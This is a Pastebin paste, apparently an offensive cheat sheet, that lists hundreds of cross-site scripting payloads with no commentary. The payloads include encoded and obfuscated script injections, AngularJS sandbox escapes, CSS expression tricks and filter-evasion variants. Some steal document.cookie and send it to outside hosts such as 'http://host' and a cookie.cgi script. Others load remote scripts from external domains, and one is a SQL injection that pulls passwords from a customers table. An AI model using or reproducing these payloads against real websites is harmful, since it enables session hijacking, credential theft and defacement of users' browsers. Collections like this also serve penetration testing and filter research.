Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <%%%>
- >”’
- ![] + []
- ?=!?,?=!?,?=!+?,?=?+?
- ?=?[?[+?]+?[+?+[+?]]+?[?]+?[+?]+?[?]+?]
- ?=?[?]+?,?=?+?,?=?+?,?=+?,?=+?,?=?[?],?=?+[?]
- ?=?+?;?=?+?,?=?+?;?=[?]+?[?],?=?[+?]
- ?=[],?={}
- ?[?[?]+?[?]+?[?]+?[?]+?+?+?[?]+?[?]+?
- ?]=[!!?]+!?+?.?)[?+=?+?+?+?+?+?+
- ?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
- /?#&;:=”%<>@[\\]^`{|}
- /*-/*`/*\`/*’/*”/**/
- ‘>//\\,<’>”>”>”*”
- ‘“(){}[];
- ”><! —
- ([,?,,,,?]=””+{},[??,??,??,??,,???,???,???,,,???]=[!!?]+!?+?.?)[?+=?+???+???+??+??+??+?+??+?+??][?](???+???+??+
- ([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,?]=[!!?]+!?+?.?)[?=?+?+?+?+?+?+?+?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
- ([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,?]=[!!?]+!?+?.?)[?+=?+?+?+?+?+?+?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
- ([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,
- ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!’’+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)
- ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!’’
- )[?]+[?]+(?+?)[?])()
- +?[?]+?](?[?]+?[?]+?[?]+?+?+(?+?
- +$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)
- (!![]+[])[0]
- %00%00%00%00%00%00%00<script>alert(11)</script>
- %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
- 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al
- 00000010: 6572 7428 3129 0c3e 0a ert(1).>.
- <
- <
- >
- >
- 00000`${alert(1)}`
- #0000108ert('XSS')>
- <
- <
- >
- >
- %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
- <
- <
- >
- >
- %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
- <
- <
- >
- >
- 0%0d%0a%00<script src=//h4k.in>
- �</form><input type=”date” onfocus=”alert(1)”>
- �</form><input type=”date” onfocus=”confirm(1)”>
- <[00]script>alert(1)</[00]script>
- %00"><script>alert(1)</script>
- <%00/title>
- 0\%22))}catch(e){confirm(2)}//
- <
- <
- >
- >
- “})}%0A%09%09alert(197);%0A{({“”:”&
- %’});%0aalert(1);%20//
- %0aalert(1);/><script>///
- %0aalert(1);/”><script>///
- %0Aonload=”eval(name)”;>
- <%0ascript>alert(1);</script>
- %0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’; “></svg>
- 0\”autofocus/onfocus=alert(1) →<video/poster/ error=prompt(2)>”-confirm(3)-”
- 0\”autofocus/onfocus=alert(1) →<video/poster/onerror=prompt(2)>”-confirm(3)-”
- <%0bscript>alert(1);</script>
- {?????????????????????????????=0;?????????????????????????????()}catch(e){alert(e)}
- (0)[‘constructor’][‘constructor’](“\141\154\145\162\164(1)”)();
- 0..constructor.constructor`alert(1)```
- <%0Cscript>alert(1);</script>
- //%0D%0A%0d%0a//
- ;//%0da=eval;b=alert;a(b(10));//
- ‘;//%0da=eval;b=alert;a(b(9));//
- %0da=eval;b=alert;a(b(/d/.source));
- <! — */!’*/!>%0D<svg/onload=confirm`1`// —
- <! — */!’*/!>%0D<svg/onload=confirm`1`//
- (0)”></img>
- 0=”>”<img src=’-alert(1)-’ onerror=”;alert(179);”>
- 0&q=’;alert(String.fromCharCode(88,83,83))//\’;alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
- 0?<script>Worker(“#”).onmessage=function(_)eval(_.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))
- ({$:#0=t,z:eval(String(#0#).replace(/@/g,))}).z//>
- \”><0x000123>
- [0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(12)</script>
- [0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(1)</script>
- [0x09,0x0B,0x0C,0x20,0x3B]
- [[0xc0]u003cimg src=1 onerror=alert(/xss/) [0xc0]u003e
- [0xc0]u003cimg src=1 onerror=alert(/xss/) [0xc0]u003e
- ( ![] + [] )[1]
- (!![]+[])[1] +
- (![]+[])[1] +
- //[10,13,8232(utf-8),8233(utf-8)]alert(1)//
- javascript:confirm(1)
- (!![]+[])[1] + (!![]+[])[0]])(9)
- 11111';\u006F\u006E\u0065rror=\u0063onfirm; throw’1
- (1?(1?{a:1?””[1?”ev\a\l”:0](1?”\a\lert”:0):0}:0).a:0)[1?”\c\a\l\l”:0](content,1?”x\s\s”:0)
- {1+1,confirm(8)}
- 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
- //1234567890123/0/?0=”>”<img src=’-alert(51)-’ onerror=”;alert(510);”>
- 123%81";alert(1);//
- 123[‘’+<_>ev</_>+<_>al</_>](‘’+<_>aler</_>+<_>t</_>+<_>(1)</_>);
- 12&<script>alert(123)</script>=123
- 1337in alert(1)
- 1337in?alert(1)
- <blink/ onmouseover=prompt(1)>OnMouseOver
- <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
- (‘\141\154\145\162\164\50\61\51’)()
- ({})[$=’\143\157\156\163\164\162\165\143\164\157\162'][$](‘\141\154\145\162\164\50/ @0x6D6172696F /\51’)()
- ({})[$=’\143\157\156\163\164\162\165\143\164\157\162'][$](‘\141\154\145\162\164\50/ 12345 /\51’)()
- [][‘\146\151\154\164\145\162’][‘\143\157\156\163\164\162\165\143\164\157\162’]
- 14.rs/#alert(document.domain)
- \152\141\166\141\163\143\162\151\160\164\072alert(1)
- 1};a=eval;b=alert;a(b(14));//
- 1];a=eval;b=alert;a(b(17));//
- 1;a=eval;b=alert;a(b(/c/.source));
- 1<a href=”data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
- 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
- 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
- 1…&alert(document.cookie)
- 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
- 1,class extends[]/alert(1){}
- 1<comment onresize=alert(1) contenteditable>1
- 1/confirm(1)
- “1\”&confirm(1)\”3"
- ___=1?’ert(123)’:0,_=1?’al’:0,__=1?’ev’:0,1[__+_](_+___)
- [1].find(alert)
- 1script3document.vulnerable=true;1/script3
- 1" →</script><svg/onload=’;alert(0);’>
- 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
- /1/[Symbol.replace](‘1’,alert)
- ~~)1(trela+tpircsavaj’.split(‘’).reverse().join(‘’).split(‘~’).join(String.fromCharCode(47)).split(‘+’).join(String.fromCharCode(58))).concat(‘
- 1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
- (![]+[])[2] +
- >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
- >%22%27><img%20src%3d%22javascript:confirm(%27%20XSS%27)%22>’%uff1cscript%uff1econfirm(‘XSS’)%uff1c/script%uff1e’”>>”’’;! — “<XSS>=&{()}
- \%22}%29%29%29}catch%28e%29{confirm%28document.domain%29;}//
- %22%3B%3E%3Cscript%3Ealert(String.fromCharCode(73,69,82,82,69%3B%3C%2Fscript%3E
- %22/%3E%3CBODY%20onload=��document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)��%3E
- %22/%3E%3CBODY%20onload=document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)%3E
- %22/%3E%3CBODY%20onload=idocument.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)i%3E
- %22%3E%3Cimg%20src=k%20onerror=alert%28%22XSS%22%29%20/%3E
- %22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
- %22%3E%3Cscript%3Ealert%28/atul/%29%3C/script%3E
- %22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
- %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
- %22%3e%3cscript%3ealert(‘XSS’)%3c/script%3e
- %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
- %22 — %3E%3C/style%3E%3C/script%3E%3Cscript%3E0x94(0x000123)%3C
- ‘%22 — %3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
- ‘%22 — %3E%3C/style%3E%3C/script%3E%3Cscript%3Exss(0x000045)%3C/script%3E
- %22;alert%28%27RVRSH3LL_XSS%29//
- \%22))}catch(e){}if(!self.a)self.a=!confirm(document.cookie)//
- \%22;confirm(1);//
- 24185.43339120701.toString(36);
- 24185.43339120701.toString(36); (7.585899999991459e-10).toString(33).match(/[a-z]+/g)[0];
- %2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
- %2522%253E%253Csvg%2520onload%3D%2522confirm(7)%2522%253E
- %2527%257Calert%2528%2527XSS%2527%2529%257C%2527
- %253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E
- %253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E
- %253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E
- %253cscript%253ealert(1)%253c/script%253e
- %253Cscript%253Ealert(1)%253C/script%253E
- %253cscript%253ealert(document.cookie)%253c/script%253e
- %253Cscript%253Ealert(‘XSS’)%253C%252Fscript%253E
- %253Cscript%253Eprompt%28%29%253C%2Fscript%253E
- %253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
- %253script%253ealert(/Xss/)%253c/script%253e
- %253script%253ealert(/Xss-By-Muhaddi/)%253c/script%253e
- “%25prompt(9)%25”
- %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
- & => %26 , # => %23 , + => %2B
- %26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
- %26%2397;lert(1)
- %26%23x003c%3Bimg%20src%3D1%20onerror%3Dalert(1)%26%23x003e%3B%0A
- ‘%26%26’javascript:alert%25281%2529//
- “%26%26prompt(9)%26%26”
- %26jsonp=alert(1);></script>
- %26lt%3bscript>
- %26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!
- “%26prompt(9)%26”
- %27%22 — %3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
- <!%27/!”/!\%27/\”/ — !><Input/Type=Text%20AutoFocus%20*/;%20OnFocus=(confirm)(1)%20//>
- %27%3C/script%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E/
- %27|alert%28%27XSS%27%29|%27
- %2BACIAPgA8-script%2BAD4-alert%28/1/%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J
- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
- %2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-
- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
- ‘%2Balert(0x000123)%2B’
- %2Balert(0x000123)%2B’
- %2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()
- 2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNv
- ❤ </3
- "><h1/onmouseover=’\u0061lert(1)’>
- "><h1/onmouseover=’\u0061lert(1)’>%00
- "><svg><style>{-o-link-source:’<body/onload=confirm(1)>’
- 'XSS')>
- /*',/**/eval(name)/*%2A///*///);width:100%;height:100%;position:absolute;-msbehavior:url(#default#time2)
- %3C
- %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
- %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e
- %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
- %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
- %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
- %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
- =”/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
- “/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
- ‘%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
- %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
- <%3C<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\x3c\x3C\u003c\u003C
- %3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fx%26%23116%3Bxs%26%2399%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E
- %3Cs%26%2399%3Bri%26%23112%3Bt%20s%26%23114%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E
- %3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%3E
- %3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fxs%26%23s63%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E
- %3Cscript%0Baaa%3Ealert%281%29%3C/script%0Baaaa%3E
- %3Cscript%0Baaa%3Ealert%281%29%3C/script%3E
- %3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E
- %3Cscript%20src=/xss.js%3E%3C/script%3E%3Cbase%20href=//evil/
- 3Cscript%3Ealert(1)%3C%2Fscript%3E
- %3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E
- %3Cscript%3Ealert(1)%3C/script%3E
- %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
- %3cscript%3ealert(document.cookie);%3c%2fscript%3e
- %3Cscript%3Ealert(document. domain);%3C/script%3E&
- %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
- %3cscript%3ealert(“WXSS”);%3c/script%3e
- %3cscript%3ealert(‘XSS’)%3c/script%3e
- %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
- %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{confirm%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
- %3Cx onerror=prompt(131)
- %3Cx onxxx=alert(1)
- %3Cx onxxx=alert(1)
- %3E
- %3E%3Cbody%20onload=javascript:alert(1)%3E
- %3E%3Cbody%20onload=javascript:alert(1)# var sc=escape(document.cookie);var d=escape(document.location);var mI=new Image();mI.src="http://host?a="+d+"&b="+ sc;
- (![]+[])[4] +
- [4076*A]<img src=”x” alt=”[0x8F]” test=” onerror=confirm(1)//”>
- ‘’;!--”<NeatHtmlReplace_XSS>=&{()}
- 500);alert(1);//
- 5.replace(/XSS/g,confirm)
- 5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
- <
- <
- >
- >
- <%/%=%><p/onresize=alert(1)//>
- 62<svg onload=alert(62)>
- <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = ‘(%2e%2a%3f)’%22)[%31]); </%73%63%72%69%70%74>
- \74svg o\156load=alert\5061\51>
- (7.585899999991459e-10).toString(33).match(/[a-z]+/g)[0];
- <%78 onerror=prompt(132)
- <%78 onxxx=1
- <%78 onxxx=1
- [84].find(alert)
- 9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
- <a
- a=`
- <a”’%0A`= +%20>;test<a”’%0A`= +%20>?test<a”’%0A`= +%20>;#test<a”’%0A`= +%20>;
- <a”’%0A`= +%20>;test<a”’%0A`= +%20>?test<a”’%0A`= +%20>;&x=”><img src=x onerror=prompt(1);>#”><img src=x onerror=prompt(1);>test<a”’%0A`= +%20>;
- a=0||’ev’+’al’||0;b=0||’locatio’;b+=0||’n.h’+’ash.sub’||0;b+=0||’str(1)’;c=b[a];c(c(b))
- a=0||’ev’+’al’,b=0||location.hash,c=0||’sub’+’str’,1[a](b[c](1))
- “a”+(0,”l”)+”ert(1)”
- a=1;a=eval;b=alert;a(b(11));//
- a=%1B$*H%1BN&b=%20type=image%20src=x%20onerror=alert(document.c haracterSet);//
- a%20onchange=alert(9)>
- <a href=[�]”� onmouseover=prompt(1)//”>XYZ</a
- a=a%3D&b=+><img+src%3Da+onerror%3Dalert(9)//
- <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
- <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
- <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
- <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
- a=<a><b>%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e</b></a>document.write(unescape(a..b))
- {{a=”a”[“constructor”].prototype;a.charAt=a.trim;$eval(‘a”,alert(alert=1),”’)}}
- =a?a?><img/src=a?xa?onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))>
- a=`${alert/*}`;
- a=`${alert`1`}`
- a;alert(1);//
- a=alert a(0)
- a=alert,a(1)
- A=alert;A(1)
- a=alert,a(83)
- a?aMaXscriptaMconfirm(1)aX/scriptaM
- “;a.b=c;//
- “;a[b]=c;//
- ‘abc(def)ghi(jkl)mno(pqr)abc(def)ghi ‘
- “‘`>ABC<div style=”font-family:’foo’*chr*x:expression(log(*num*));/*’;”>DEF
- “‘`>ABC<div style=”font-family:’foo*chr*;x:expression(log(*num*));/*’;”>DEF
- “‘`>ABC<div style=”font-family:’foo’\x3Bx:expression(javascript:alert(1);/*’;”>DEF
- “‘`>ABC<div style=”font-family:’foo’\x3Bx:expression(javascript:alert(1);/*’;”>DEF
- “‘`>ABC<div style=”font-family:’foo’\x7Dx:expression(javascript:alert(1);/*’;”>DEF
- “‘`>ABC<div style=”font-family:’foo’\x7Dx:expression(javascript:alert(1);/*’;”>DEF
- ABC<div style=”x:expression\x00(javascript:alert(1)”>DEF
- ABC<div style=”x:expression\x5C(javascript:alert(1)”>DEF
- ABC<div style=”x:exp\x00ression(javascript:alert(1)”>DEF
- ABC<div style=”x:exp\x5Cression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x00expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x09expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x0Aexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x0Bexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x0Cexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x0Dexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\x20expression(javascript:alert(1)”>DEF
- ABC<div style=”x\x3Aexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xC2\xA0expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x80expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x81expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x82expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x83expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x84expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x85expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x86expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x87expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x88expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x89expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x8Aexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE2\x80\x8Bexpression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xE3\x80\x80expression(javascript:alert(1)”>DEF
- ABC<div style=”x:\xEF\xBB\xBFexpression(javascript:alert(1)”>DEF
- a{b:`function(){alert(1)}()`;}
- <AboutBoxText><![CDATA[<a href=javascript:alert(1337)>Click me</a>]]> </AboutBoxText>
- about://xss.cx
- accesskey=x onclick=alert(1) 1=
- “ accesskey=x onclick=alert(1) 1=’
- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
- a. click()
- {{a=’constructor’;b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,’alert(1)’)()}}
- {{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1} } };alert(1)//’);}}
- {{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1}}};alert(1)//’);}}
- {{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=alert(1)’);}}
- {{‘a’.constructor.prototype.charAt=’’.valueOf;$eval(“x=’\”+(y=’if(!window\\u002ex)alert(window\\u002ex=1)’)+eval(y)+\”’”);}}
- <A?cript/async/src=//a?a?L>
- action=//localhost/self/login.php?returnURL=changemail.php>
- <a data-remote=true data-method=delete href=/delete_account>CLICK</a>
- a=document.createElement(‘a’)
- +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
- +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
- +ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
- +ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-
- +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
- };a=eval;b=alert;a(b(12));//
- ‘};a=eval;b=alert;a(b(13));//
- ‘];a=eval;b=alert;a(b(15));//
- ];a=eval;b=alert;a(b(16));//
- */a=eval;b=alert;a(b(/e/.source));/*
- a=/ev/ .source a+=/al/ .source,a = a[a] a(name)
- a=/ev/// .source a+=/al/// .source a[a] (name)
- “><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%>
- <!a foo=x=`y><img alt=”`><img src=xx:x onerror=alert(2)//”>
- <?a foo=x=`y><img alt=”`><img src=xx:x onerror=alert(3)//”>
- a=function(){},(p=>p.c=()=>alert(‘d’))(a.prototype),b=new a,b.c()
- a=”get”;
- a=\”get\”;
- a=”;get”;;&;#10;b=”;URL(“;”;;&;#10;c=”;javascript:”;;&;#10;d=”;alert(‘;XSS’;);”;)”;; eval(a+b+c+d);
- a=”get”; b=”URL(“”; c=”javascript:”; d=”alert(‘XSS’);”)”;eval(a+b+c+d);
- a=”get”;b=”URL”;c=”javascript:”;d=”alert(1);”;eval(a+b+c+d);
- a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘X10SS’);”;eval(a+b+c+d);
- a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a?);
- a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);
- a=”get”; b=”URL(\””; c=”javascript:”; d=”alert(‘XSS’);\”)”; eval(a+b+c+d);
- a=”get”;b=”URL(\””;c=”javascript:”;d=”alert(‘XSS’);\”)”;eval(a+b+c+d);
- a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);\”)”;eval(a+b+c+d+e);
- <% a=%><iframe/onload=alert(1)//>
